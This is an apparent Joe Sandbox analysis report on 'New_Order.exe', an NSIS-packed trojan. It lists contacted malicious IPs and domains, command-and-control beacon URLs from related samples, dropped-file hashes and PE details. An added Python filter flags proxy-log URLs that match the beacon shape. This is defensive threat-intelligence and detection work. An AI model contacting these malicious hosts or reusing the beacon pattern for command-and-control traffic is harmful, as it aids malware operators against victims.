http://fontfabrik.com | explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.founder.com.cn/cn | explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/frere-jones.html | explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp | false | - | high
http://nsis.sf.net/NSIS_Error | New_Order.exe | false | - | high
http://www.jiyu-kobo.co.jp/ | explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/DPlease | explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers8 | explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp | false | - | high
http://www.fonts.com | explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp | false | - | high
http://www.sandoll.co.kr | explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.urwpp.deDPlease | explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.zhongyicts.com.cn | explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.sakkal.com | explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown

                                                                      Contacted IPs

                                                                      Public

IP | Domain | Country | ASN | ASN Name | Malicious
75.2.115.196 | www.roastedorganic.com | United States | 16509 | AMAZON-02US | true
62.149.189.71 | www.geacasolaro.com | Italy | 31034 | ARUBA-ASNIT | true
91.148.168.141 | voiceclubdubai.com | Bulgaria | 31083 | TELEPOINTBG | true
23.227.38.74 | shops.myshopify.com | Canada | 13335 | CLOUDFLARENETUS | true
34.102.136.180 | susanestuart.com | United States | 15169 | GOOGLEUS | false
85.233.160.22 | fwd3.hosts.co.uk | United Kingdom | 8622 | ISIONUKNamescoLimitedGB | true
8.210.40.49 | www.hdjakdhf.com | Singapore | 45102 | CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | true
150.95.255.38 | www.year-action.xyz | Japan | 7506 | INTERQGMOInternetIncJP | true

                                                                      General Information

Joe Sandbox Version: 32.0.0 Black Diamond
Analysis ID: 411746
Start date: 12.05.2021
Start time: 06:08:51
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 9m 49s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: New_Order.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 25
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winEXE@7/3@13/8
EGA Information: Failed
HDC Information:
• Successful, ratio: 65.7% (good quality ratio 60.7%)
• Quality average: 72.7%
• Quality standard deviation: 31%
HCA Information:
• Successful, ratio: 88%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe

                                                                      Simulations

                                                                      Behavior and APIs

                                                                      No simulations

                                                                      Joe Sandbox View / Context

                                                                      IPs

Match | Associated Sample Name / URL | Detection | Context
75.2.115.196 | PO#6275473, Shipping.exe | malicious | www.neverpossible.com/nyr/?hFN=HMvQt6bkCevDbBHl57tIpg2VEEGTCu7btVM4jmpr9u1g6ochkRM7DKqFK8ehddD2fJuq&znp8sT=8pwxRHeHx
75.2.115.196 | file.exe | malicious | www.officialtimelessbeauty.com/ud9e/?8pK0l4=P93bHQjnxxVAZ9Sn5t3lLhH96Scwn9CJKfcYg3q1h+dYAJf5pCDrtfQdckA+HT/QOAgK&EhU45z=gdJpOxNhdV
75.2.115.196 | file.exe | malicious | www.officialtimelessbeauty.com/ud9e/?KtxD=P93bHQjnxxVAZ9Sn5t3lLhH96Scwn9CJKfcYg3q1h+dYAJf5pCDrtfQdckA+HT/QOAgK&p0D=AdhDQXr
75.2.115.196 | Bill Of Lading & Packing List.pdf.gz.exe | malicious | www.officialtimelessbeauty.com/ud9e/?M6cphXg=P93bHQjnxxVAZ9Sn5t3lLhH96Scwn9CJKfcYg3q1h+dYAJf5pCDrtfQdcnguIyvoQlJN&VtX8=J48HPvgx
75.2.115.196 | raw f.exe | malicious | www.officialtimelessbeauty.com/ud9e/?inCTmJ0x=P93bHQjnxxVAZ9Sn5t3lLhH96Scwn9CJKfcYg3q1h+dYAJf5pCDrtfQdckA+HT/QOAgK&lnxdA=rBZlir70eHDp
91.148.168.141 | 41RFQ00952319 order specificatio.exe | malicious | microchiip.com/iykelink/
91.148.168.141 | 46DOCUMENT449323.exe | malicious | microchiip.com/iykelink/
91.148.168.141 | 19DOC8943.exe | malicious | microchiip.com/iykelink/
23.227.38.74 | correct invoice.exe | malicious | www.lovereeko.com/s5cm/?Zh3XHBo=1FGxjFcj1FUPzS/D0SlDguBIAwatlX2WBNFXThGVt5K3dMRyhfFKBeUeQKKI53c+UOaemgtTFA==&Xv0Hzp=j0Dx
23.227.38.74 | PP,Sporda.exe | malicious | www.buymobilia.com/ugtw/?CVvTU=eThLp0qHv8&-Z=EKeLO8zcMggvyAnqu6sC/Qc/mwltFAuWVzDVO+nGfwm2nIuXQAQy4fFMC2pIsww48MiRk2Tftg==
23.227.38.74 | New Order.exe | malicious | www.thirdgenerationfarms.com/un8c/?l4=1bNDCf9Pbhw&a2MLWLu=K7pYdtPf1O8pkq5RJpQL9NxmcqWMJU+Ppy9tvWhY4bI/nVqWSKBoLDAkJ733m7sxbxGP
23.227.38.74 | slot Charges.exe | malicious | www.melaniesalascosmetics.com/u8nw/?iL3=OMuX02IYc5Ry0CQoPq4Nk832vdQs1BoNEyIrcTfOmq7/yl/rKnuAOoEnA6+SduwRjnFtQLe2lQ==&z6A=7n3h7JeH
23.227.38.74 | WAkePI6vWufG5Bb.exe | malicious | www.dtmfitwear.com/i3cn/?o6A=adsPEH&o81L=H7+d7rkdlFG2nJnRYlgPOAiJBnunM3J+jeKjPbRv+UYLXY3B67SpW8jkP/G3pjkkmaap
23.227.38.74 | PO09641.exe | malicious | www.safegrinder.com/or4i/?UL=ER-POL&r6t0=bE8h/5YlyIaGfqFoj5Gnx56lPI3pmXv2ej3H/Ly1qjs4t+LIMarOZaaU39382eFE9bBmbj0G0Q==
23.227.38.74 | PO#6275473, Shipping.exe | malicious | www.maluss.com/nyr/?znp8sT=8pwxRHeHx&hFN=MKniHD/KKNZ944A0QkseLq559MRPs5jQaAqVav9SZ3PAwf03LQBPNZ+ImUBZS4FtrISW
23.227.38.74 | 4LkSpeVqKR.exe | malicious | www.funnyfootballmugs.com/uoe8/?rDHpw=oRF9sMnf9PdLhjUOIBAEDWVppNUvEE2O6ED6s7IbEJi5z3I9xavY20aFrDWDg7pV30V8&V2=LhqpTfJ8
23.227.38.74 | PO889876.pdf.exe | malicious | www.soberrituals.com/a7dr/?NTots4J=tjW8ooLTa1jsWUklWWMZll7OVycfhiXpLtdzqL9aLAWMUkY+/Iy+agj0kOGNTOmqAWvW&Ch9De=9rj01Zg0
23.227.38.74 | Il nuovo ordine e nell'elenco allegato.exe | malicious | www.sunflowermoonstudio.com/3nop/
23.227.38.74 | Order Euro 890,000.exe | malicious | www.salonandspaworld.com/nbg/?AnE=N0DpoDyPy2&GzuDf=pEf6xflKLJsdCsdUJB49tHY3u81x5ITOFjKvog1CNLboxxP0rMA1boKXAxg6YVhGFy4W
23.227.38.74 | products order pdf .exe | malicious | www.vrolin.com/nt8e/?jfLlfJ=9rUhSLlxSB2&uR-lx=++xYuLJgoH6pp3kD7RvwfttHqcXzQyvEvUgnOCU49uNqHCcn0mAStAECI82CVhbRI5Zx
23.227.38.74 | REVISED ORDER.exe | malicious | www.shamansmoke.com/owws/?uDKhk=JfrPs86HdHGxMH&0pn=sHG+rQoOJeG4yTomgNlDQDPnHQ0IPx4pk+i/lkC8Qh0EEzCngsrhrbrKo7rF6GEUFueH
23.227.38.74 | NEW ORDER.exe | malicious | www.melaniesalascosmetics.com/u8nw/?GVIp=OMuX02IYc5Ry0CQoPq4Nk832vdQs1BoNEyIrcTfOmq7/yl/rKnuAOoEnA6+rCfQStxZqQLex2g==&tzr4=jlIXVLPHc
23.227.38.74 | PROFORMA INVOICE210505133444.xlsx | malicious | www.krewdog.com/hci/?HxolvBpX=A66Wlw4/Hrn0D6Biie/ZwxRaZIzTFJAuk4a3Hyus0i/oquN3TyNySX6ptiaSdx39RKDNRw==&NpJ=fDH4E
23.227.38.74 | Quotation_05052021.Pdf.exe | malicious | www.moondusht.com/ihmh/?jL30vv=24Imnj46Zwn2iPXFlicawvhA5pNJwcknz4KeGPUwn6tGSh+cC2AatXSx6EmNHHhT195k&K2MHFj=ExoxkhRpmdq0
23.227.38.74 | MOe7vYpWXW.exe | malicious | www.riandmoara.com/op9s/
23.227.38.74 | 08917506_by_Libranalysis.exe | malicious | www.marielivet.com/o86d/?W6jDfD=PL9u7p4v7hn5T83wCAG42BUGAPPNW4v8+s1TFKrmIVkrOUDjB/r4wvcv+gOAAG+Oa4qYtq3B7Q==&Yn=ybdHh8KP02GTtb
23.227.38.74 | 202139769574 Shipping Documents.exe | malicious | www.maluss.com/nyr/?tVZl=MKniHD/KKNZ944A0QkseLq559MRPs5jQaAqVav9SZ3PAwf03LQBPNZ+ImXhjCplVxvzR&U4kp=NtxHhLZ8S6kT5jw
23.227.38.74 | Remittance Advice pdf.exe | malicious | www.sewadorbsclothing.com/nt8e/?blm=TToywE07YkGPr1SSYVo5Zl0eXSAn7PGjTs4OR5iBsoxazNcvt6mcqDrbAAXGiUlQyBjZ6mutAA==&tVTd=M6AhI
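
The context URLs listed above share one shape: a single short alphanumeric directory under the host, followed either by nothing or by a query string of two parameters, one of which carries a long base64-like blob. The hunt filter below is an added example and is not part of the Joe Sandbox report. The shape is inferred from the entries listed here and is an assumption, not a vendor signature; the proxy-log lines it runs over are constructed for the example, and the names classify and hunt are chosen for it.

```python
import re
from typing import List, Optional, Tuple

# Shape inferred from the context URLs above (assumption, not a signature):
# optional scheme, host, ONE short alphanumeric directory, trailing slash,
# and an optional query string.
_PATH_RE = re.compile(
    r"^(?:https?://)?(?P<host>[^/?#]+)/(?P<dir>[a-z0-9]{3,4})/"
    r"(?:\?(?P<query>[^#]*))?$"
)
# Alphabet of the long parameter value: standard base64 plus '=' padding.
_BLOB_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")
# The shortest blob in the table above is about 60 characters; 40 leaves margin.
MIN_BLOB_LEN = 40


def _split_query(query: str) -> List[Tuple[str, str]]:
    """Split on '&' and on the FIRST '=' only.  urllib.parse.parse_qsl is
    deliberately avoided because it would turn the '+' characters inside
    the blob into spaces before we can inspect them."""
    pairs = []
    for part in query.split("&"):
        if part:
            key, _, value = part.partition("=")
            pairs.append((key, value))
    return pairs


def classify(url: str) -> Optional[str]:
    """Return 'beacon' when the URL has the short directory plus a
    two-parameter query in which exactly one value is a long base64-like
    blob, 'path-only' for the bare short directory, and None otherwise."""
    m = _PATH_RE.match(url.strip())
    if not m:
        return None
    query = m.group("query")
    if not query:
        return "path-only"
    pairs = _split_query(query)
    if len(pairs) != 2:
        return None
    blobs = [v for _, v in pairs if len(v) >= MIN_BLOB_LEN and _BLOB_RE.match(v)]
    return "beacon" if len(blobs) == 1 else None


# Constructed proxy-log lines for the example (NOT from the report):
# "<timestamp> <client> <method> <url> <status>".
SAMPLE_LOG = """\
2021-05-12T06:09:01Z 10.0.0.5 GET www.officialtimelessbeauty.com/ud9e/?8pK0l4=P93bHQjnxxVAZ9Sn5t3lLhH96Scwn9CJKfcYg3q1h+dYAJf5pCDrtfQdckA+HT/QOAgK&EhU45z=gdJpOxNhdV 200
2021-05-12T06:09:03Z 10.0.0.5 GET www.riandmoara.com/op9s/ 200
2021-05-12T06:09:05Z 10.0.0.7 GET microchiip.com/iykelink/ 404
2021-05-12T06:09:09Z 10.0.0.9 GET www.example.com/abcd/?q=search&page=2 200
"""


def hunt(log_text: str) -> List[Tuple[str, str, str]]:
    """Return (client, url, label) for every log line whose URL matches."""
    hits = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) < 5:
            continue
        client, url = fields[1], fields[3]
        label = classify(url)
        if label:
            hits.append((client, url, label))
    return hits


if __name__ == "__main__":
    for client, url, label in hunt(SAMPLE_LOG):
        print(f"{label:9s} {client:10s} {url}")
```

classify reports 'beacon' only when exactly one of the two parameters carries the blob; a bare short directory such as www.riandmoara.com/op9s/ comes back as 'path-only' because on its own it is too weak to act on, and an ordinary two-parameter query such as ?q=search&page=2 returns None. Treat hits as hunting leads to pivot on (client, host, the other samples in this table), not as a block decision.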

                                                                      Domains

Match | Associated Sample Name / URL | Detection | Context
fwd3.hosts.co.uk | SWIFT 00395_IMG.exe | malicious | 85.233.160.23
fwd3.hosts.co.uk | krJF4BtzSv.exe | malicious | 85.233.160.24
fwd3.hosts.co.uk | y6f8O0kbEB.exe | malicious | 85.233.160.23
fwd3.hosts.co.uk | S3d02jGrQo.exe | malicious | 85.233.160.22
fwd3.hosts.co.uk | 9JFrEPf5w7.exe | malicious | 85.233.160.24
fwd3.hosts.co.uk | Proforma Invoice 2.xlsx | malicious | 85.233.160.23
fwd3.hosts.co.uk | 9tRIEZUd1j.exe | malicious | 85.233.160.23
fwd3.hosts.co.uk | Y79FTQtEqG.exe | malicious | 85.233.160.22
fwd3.hosts.co.uk | FeDex Shipment Confirmation.exe | malicious | 85.233.160.23
fwd3.hosts.co.uk | LElwKuxT4D.exe | malicious | 85.233.160.22
fwd3.hosts.co.uk | Shipment Document BL,INV and packing list.exe | malicious | 85.233.160.23
fwd3.hosts.co.uk | Purchase Order pdf.exe | malicious | 85.233.160.22
fwd3.hosts.co.uk | ORDER pdf.exe | malicious | 85.233.160.23
fwd3.hosts.co.uk | Scan-PI497110_pdf.gz.exe | malicious | 85.233.160.22
fwd3.hosts.co.uk | PO 213409701.xlsx | malicious | 85.233.160.23
fwd3.hosts.co.uk | PROFOMA INVOICE pdf.exe | malicious | 85.233.160.22
fwd3.hosts.co.uk | Sf6jgQc6Ww.exe | malicious | 85.233.160.23
fwd3.hosts.co.uk | winlog(1).exe | malicious | 85.233.160.23
fwd3.hosts.co.uk | payment list.xlsx | malicious | 85.233.160.22
fwd3.hosts.co.uk | cGLVytu1ps.exe | malicious | 85.233.160.23
shops.myshopify.com | correct invoice.exe | malicious | 23.227.38.74
shops.myshopify.com | PP,Sporda.exe | malicious | 23.227.38.74
shops.myshopify.com | Purchase Order.exe | malicious | 23.227.38.74
shops.myshopify.com | PAYMENT INSTRUCTIONS COPY.exe | malicious | 23.227.38.74
shops.myshopify.com | New Order.exe | malicious | 23.227.38.74
shops.myshopify.com | slot Charges.exe | malicious | 23.227.38.74
shops.myshopify.com | WAkePI6vWufG5Bb.exe | malicious | 23.227.38.74
shops.myshopify.com | PO09641.exe | malicious | 23.227.38.74
shops.myshopify.com | PO#6275473, Shipping.exe | malicious | 23.227.38.74
shops.myshopify.com | 4LkSpeVqKR.exe | malicious | 23.227.38.74
shops.myshopify.com | PO889876.pdf.exe | malicious | 23.227.38.74
shops.myshopify.com | Il nuovo ordine e nell'elenco allegato.exe | malicious | 23.227.38.74
shops.myshopify.com | Order Euro 890,000.exe | malicious | 23.227.38.74
shops.myshopify.com | winlog.exe | malicious | 23.227.38.74
shops.myshopify.com | products order pdf .exe | malicious | 23.227.38.74
shops.myshopify.com | REVISED ORDER.exe | malicious | 23.227.38.74
shops.myshopify.com | e9777bb4_by_Libranalysis.exe | malicious | 23.227.38.74
shops.myshopify.com | NEW ORDER.exe | malicious | 23.227.38.74
shops.myshopify.com | PROFORMA INVOICE210505133444.xlsx | malicious | 23.227.38.74
shops.myshopify.com | Quotation_05052021.Pdf.exe | malicious | 23.227.38.74

                                                                      ASN

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                      ARUBA-ASNIT4GGwmv0AJm.exeGet hashmaliciousBrowse
                                                                      • 62.149.142.170
                                                                      a3aa510e_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                      • 62.149.128.40
                                                                      8D7A2AE1A479BBCA9229723C2308C564B7477791E047D.exeGet hashmaliciousBrowse
                                                                      • 188.213.167.248
                                                                      efubZxu50u.dllGet hashmaliciousBrowse
                                                                      • 80.211.33.13
                                                                      DcDVzchpHN.dllGet hashmaliciousBrowse
                                                                      • 80.211.33.13
                                                                      efubZxu50u.dllGet hashmaliciousBrowse
                                                                      • 80.211.33.13
                                                                      S1grVjDTSa.dllGet hashmaliciousBrowse
                                                                      • 80.211.33.13
                                                                      HG1fxDiIfH.dllGet hashmaliciousBrowse
                                                                      • 80.211.33.13
                                                                      DcDVzchpHN.dllGet hashmaliciousBrowse
                                                                      • 80.211.33.13
                                                                      S1grVjDTSa.dllGet hashmaliciousBrowse
                                                                      • 80.211.33.13
                                                                      Z6F68M8dUn.dllGet hashmaliciousBrowse
                                                                      • 80.211.33.13
                                                                      HG1fxDiIfH.dllGet hashmaliciousBrowse
                                                                      • 80.211.33.13
                                                                      Z6F68M8dUn.dllGet hashmaliciousBrowse
                                                                      • 80.211.33.13
                                                                      gunzipped.exeGet hashmaliciousBrowse
                                                                      • 80.88.87.202
                                                                      gunzipped.exeGet hashmaliciousBrowse
                                                                      • 80.88.87.202
                                                                      7EcAk8vh08.dllGet hashmaliciousBrowse
                                                                      • 80.211.33.13
                                                                      Pu7cgGrOOG.dllGet hashmaliciousBrowse
                                                                      • 80.211.33.13
                                                                      eA2oqiHTh5.dllGet hashmaliciousBrowse
                                                                      • 80.211.33.13
                                                                      7EcAk8vh08.dllGet hashmaliciousBrowse
                                                                      • 80.211.33.13
                                                                      Pu7cgGrOOG.dllGet hashmaliciousBrowse
                                                                      • 80.211.33.13
                                                                      TELEPOINTBG#CMA-CMG.exeGet hashmaliciousBrowse
                                                                      • 78.128.8.31
                                                                      #CMA-CMB.exeGet hashmaliciousBrowse
                                                                      • 78.128.8.31
                                                                      FACTURA 6475.exeGet hashmaliciousBrowse
                                                                      • 78.128.8.31
                                                                      generated order 677120.xlsmGet hashmaliciousBrowse
                                                                      • 217.174.152.36
                                                                      Associated Sample Name                          Detection   Context (IP)
                                                                      generated_check_9698936.xlsm                    malicious   217.174.152.52
                                                                      purchase order 370149.xlsm                      malicious   217.174.152.36
                                                                      copy of fax 04946.xlsm                          malicious   217.174.152.36
                                                                      scan of order 2570.xlsm                         malicious   217.174.152.52
                                                                      AWB-18267638920511_ES.exe                       malicious   78.128.8.31
                                                                      export of payment 2993132.xlsm                  malicious   217.174.152.52
                                                                      check 392553.xlsm                               malicious   217.174.152.36
                                                                      FACTURA 6476.exe                                malicious   78.128.8.31
                                                                      Zam#U00f3wienie-290421.85655463.exe             malicious   78.128.8.31
                                                                      PZnr10961754.exe                                malicious   78.128.8.31
                                                                      Nieprawid#U0142owy IBAN.exe                     malicious   78.128.8.31
                                                                      AWB-182676389205111_ES.exe                      malicious   78.128.8.31
                                                                      xVvAobZvWU.exe                                  malicious   78.128.8.31
                                                                      FAKTURA I RACHUNKI.exe                          malicious   78.128.8.31
                                                                      0AX4532QWSA.xlsx                                malicious   217.174.152.38
                                                                      INV8222874744_20210111490395.xlsm               malicious   217.174.149.3
                                                                      AMAZON-02US
                                                                      NAVTECO_R1_10_05_2021,pdf.exe                   malicious   13.58.50.133
                                                                      YDHhjjAEFbel88t.exe                             malicious   99.83.175.80
                                                                      yU7RItYEQ9kCkZE.exe                             malicious   99.83.175.80
                                                                      Shipment Document BL,INV and packing List.exe   malicious   52.58.78.16
                                                                      4xPBZai06p.dll                                  malicious   13.225.75.73
                                                                      0OyVQNXrTo.exe                                  malicious   3.142.167.54
                                                                      rAd00Nae9w.dll                                  malicious   13.225.75.73
                                                                      DOC24457188209927.exe                           malicious   13.224.193.2
                                                                      user-invoice-8488888.doc                        malicious   104.192.141.1
                                                                      user-invoice-8488888.doc                        malicious   104.192.141.1
                                                                      ProForma Invoice 20210510.exe                   malicious   13.113.228.117
                                                                      PO9448882.exe                                   malicious   18.219.49.238
                                                                      jjbxg8kh5X.exe                                  malicious   52.216.177.83
                                                                      4si5VtPNTe.exe                                  malicious   3.6.208.121
                                                                      latvia-order-051121_.doc                        malicious   52.219.129.63
                                                                      BANK-ACCOUNT. NUMBER.PDF.exe                    malicious   3.16.197.4
                                                                      PRF00202156KMT.exe                              malicious   3.16.197.4
                                                                      PP,Sporda.exe                                   malicious   44.227.76.166
                                                                      Report000042.htm                                malicious   13.224.193.89
                                                                      Materialliste f#U00fcr Angebot.exe              malicious   3.16.197.4

                                                                      JA3 Fingerprints

                                                                      No context

                                                                      Dropped Files

                                                                      No context

                                                                      Created / dropped Files

                                                                      C:\Users\user\AppData\Local\Temp\8n7cv9pwr2kwl9
                                                                      Process:C:\Users\user\Desktop\New_Order.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):7173
                                                                      Entropy (8bit):7.643378493516249
                                                                      Encrypted:false
                                                                      SSDEEP:192:kWsIQunuTrpLAHF5te0ulc1fFpvHnMQflsQB1:kWzJuZGFwl2Njr1
                                                                      MD5:3C64776F75B97A4C93D6D618B56A6F34
                                                                      SHA1:621734AAB7D0C78F31E2710792CED1ECA8A25A42
                                                                      SHA-256:15C34F8796FADC9344F3F00A92ABF56576290325A80CA2E1FAE1DFC472FE4AE3
                                                                      SHA-512:8F3B4AA2178F4439DAF14E4CD05BC9D0CFCC21FA2F8940A163EE11E95A6608152D7B52867F69AF0A9DFF591191A1743C84F46CE0961D9C6983620AB3565208E4
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      Preview: f..73...gQG.y.K..W..i..CG.y$A...k.S.IcT.k..K....W).JK...GC...pQ.Jo.a......v.G.*.V....W..FLB...{.1...P~.J..a...l*..Q.....Bg[.6<....v{...0V...j.k.F4Z...v.....p.a...yF.BT)....QB.F......D...l..vkWP... F..g..V.B...v[..BP.p^.J..d..L.!v..p...p4..|.....F{O..@....J.{.V4*...7.ZPF.n.......BT.!....B.V...j..dFtZ."...G....p..bw[<.......[.PB.F...J..Cb.....Tj!v{....g..J...r.....P{[.4.@...l...8V4...k.<ZPj..t......V.!...n.B..z.....XFt..........twW2.......[.NTB......OP..fB....*.!tg.....v.........bH.LoOO@.4.%J.{.V4*...9......yopVy.ICB...3T.....'.$...1...BgA....twY....v...|..../...J..#,..{.V.!p{.c..b..........$.....4.@j..twW.0.,...[;.<B@.......P..fDa..K..Z.*H!...g.V|.....;cLBPbH.Lo...........*.....W..PFLlE.g.....TCW..a.....f.o.....Y.....bs.[^4.@.l...,z<.SW[i.fE...P.....O.Z.F...N.B<....SS..AtZP..B/]...~</..w[2...d/.KVh.h=cGG...P..vs.\...L..#.....T.7...,..#..G..@6.F......dx.SS[;A<B@.....L........KRF.Z..:..V...3OO.9H.*^...Ys9.I.!.h'.....N.*\..{[w...FyH.~)......
                                                                      C:\Users\user\AppData\Local\Temp\nshC36E.tmp\a9g5j8lkcs3.dll
                                                                      Process:C:\Users\user\Desktop\New_Order.exe
                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):4096
                                                                      Entropy (8bit):4.26548315942308
                                                                      Encrypted:false
                                                                      SSDEEP:48:i1kuQn1ASkT3Jd95EiKT0RlsgmoKbFThbmhnheDKbgXWoqsScz5dXmeS:W4n1ASkP3KgRlsaKZnKcXWoq7czQ
                                                                      MD5:857951253D45E28242D6EFFFF15D2BE6
                                                                      SHA1:94BCE2130D6BC960C42023FCFAEC4CFE1578905B
                                                                      SHA-256:FE179C45D6115D5D7238857C0DFA7D48E24182CF4AC2C9365925DC4EB4BCDA4E
                                                                      SHA-512:9436F62D193ACD3C738278AFF98ED0E2EB2AB490D7BE46E04C8B2282E84E5027CE3DCCAEF2C531313BB17E7285D290BC2736850E7D267F3E4ABC52FBCA8E8429
                                                                      Malicious:true
                                                                      Antivirus:
                                                                      • Antivirus: ReversingLabs, Detection: 45%
                                                                      Reputation:low
                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...............................................................................PE..L......`...........!......................... ...............................@....................................... ..T....!....................................... ............................................... ...............................text............................... ..`.rdata....... ......................@..@.data... ....0......................@...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                      C:\Users\user\AppData\Local\Temp\p4uvvpfyo5r9igyk
                                                                      Process:C:\Users\user\Desktop\New_Order.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):164864
                                                                      Entropy (8bit):7.998945413738887
                                                                      Encrypted:true
                                                                      SSDEEP:3072:Tbz4IUuyr/iFThKRJq8haAGTnGhqPzj9C+a446GjKcAvBMQ4CNel:TbzR/ACYRJq8uTGAli4EKVvBMSkl
                                                                      MD5:1842785601112C137E81EA60E9504A13
                                                                      SHA1:904245EBB63CF1FF6DF3461026C179A7B1E9083B
                                                                      SHA-256:CE4A558A3F3B767B8E041794A63587145306752BCB2C990200CD6C48DB3C610E
                                                                      SHA-512:19A0EF1E359E041B0C6E6FEC991E26CB16BFDDC705F8A1C63D3F4C5B0A94A8B1BD1CC935659E637E446F3132A2EF440B38CD90716DBB950169C591337B3218D0
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      Preview: ..(..g.....s.V@..9n.h.9.#..W....".}.......Q.Q....8z.{jyX.i.T-....6D...@...U...D.....c.|9.e.R1%..*.MG..H!1..@..^_...uF.......%.!.:~d.......^..>.d.L)..3..*...J(W...i..............9.:.u...u.2.?h..N.;P.;.].M......B.r..<Qy.S.g..Uf&..6.....Y....-R3..|U../.3.p.~x.)*={)7g......x.=...T..<.O+.2..`....RgOM.(4.G\..j..c.&.Tb.c..s...~..9v.aqT....5..2..\.:.S.O....S.2xi{.~OM.....*g..\...x.?.'N....\.I....H...2.&...Z.n.0.....!.1.Td{'{;p.}..%.$aZ.Wo......r.*.fn.............q..dq..V.....W@mD`].f-.v.E."XUgL..7.R......J.."....la.z..6....Zu.:.S+.]K..~/.Hy.e.V...|.>,f.9...&....\!......0..w?U...2O..2l...5..<..=N..GV.y.......Q...%9..&k..%.YMm7....(.p....z4Od....T$....$k....04....@7......OY..!.?.....>....xT.%.W.Q. ....?."..m....@...(..!..-.WpRF.30c).....C;.U..._l......68...I.G.y...w?b...B4...f.}....C.V.LtTvb....T.ey.G.'..O..CH.........S.$N..aP..h.....i......]t..._.....j........4.wp....[..=8.lb..?D.. .Q..Q..PU.^;....pU):,...d=...w......F..4...3...r.F.X..h.?..

                                                                      Static File Info

                                                                      General

                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                      Entropy (8bit):7.551360925759815
                                                                      TrID:
                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                      File name:New_Order.exe
                                                                      File size:344003
                                                                      MD5:74e4eb9afbf8f9c9b285a46ced831979
                                                                      SHA1:8d65df9dc971c859f0a86a158d9576f528603410
                                                                      SHA256:68c72cdcc504fcbffe3d6219cbeeed9586e0e362f073070eda7c0b4ed962d14a
                                                                      SHA512:14c0dd32728a4e0a7cc1ceead7f78773e599000facf25dddbcd00404674ca97742784734433d5a858ca0063b57e678c599d664a16183798b4e607ff3557b0968
                                                                      SSDEEP:6144:f9X0Gni/KtKNZIcxjbzR/ACYRJq8uTGAli4EKVvBMSk6:p0MtKNZlXR/36JQTXvvV5MI
                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1)..PG..PG..PG.*_...PG..PF.IPG.*_...PG..sw..PG..VA..PG.Rich.PG.........PE..L...".$_.................f...|......H3............@

                                                                      File Icon

                                                                      Icon Hash:960d4b6e0f3e3642

                                                                      Static PE Info

                                                                      General

                                                                      Entrypoint:0x403348
                                                                      Entrypoint Section:.text
                                                                      Digitally signed:false
                                                                      Imagebase:0x400000
                                                                      Subsystem:windows gui
                                                                      Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                      DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                      Time Stamp:0x5F24D722 [Sat Aug 1 02:44:50 2020 UTC]
                                                                      TLS Callbacks:
                                                                      CLR (.Net) Version:
                                                                      OS Version Major:4
                                                                      OS Version Minor:0
                                                                      File Version Major:4
                                                                      File Version Minor:0
                                                                      Subsystem Version Major:4
                                                                      Subsystem Version Minor:0
                                                                      Import Hash:ced282d9b261d1462772017fe2f6972b

                                                                      Entrypoint Preview

                                                                      Instruction
                                                                      sub esp, 00000184h
                                                                      push ebx
                                                                      push esi
                                                                      push edi
                                                                      xor ebx, ebx
                                                                      push 00008001h
                                                                      mov dword ptr [esp+18h], ebx
                                                                      mov dword ptr [esp+10h], 0040A198h
                                                                      mov dword ptr [esp+20h], ebx
                                                                      mov byte ptr [esp+14h], 00000020h
                                                                      call dword ptr [004080B8h]
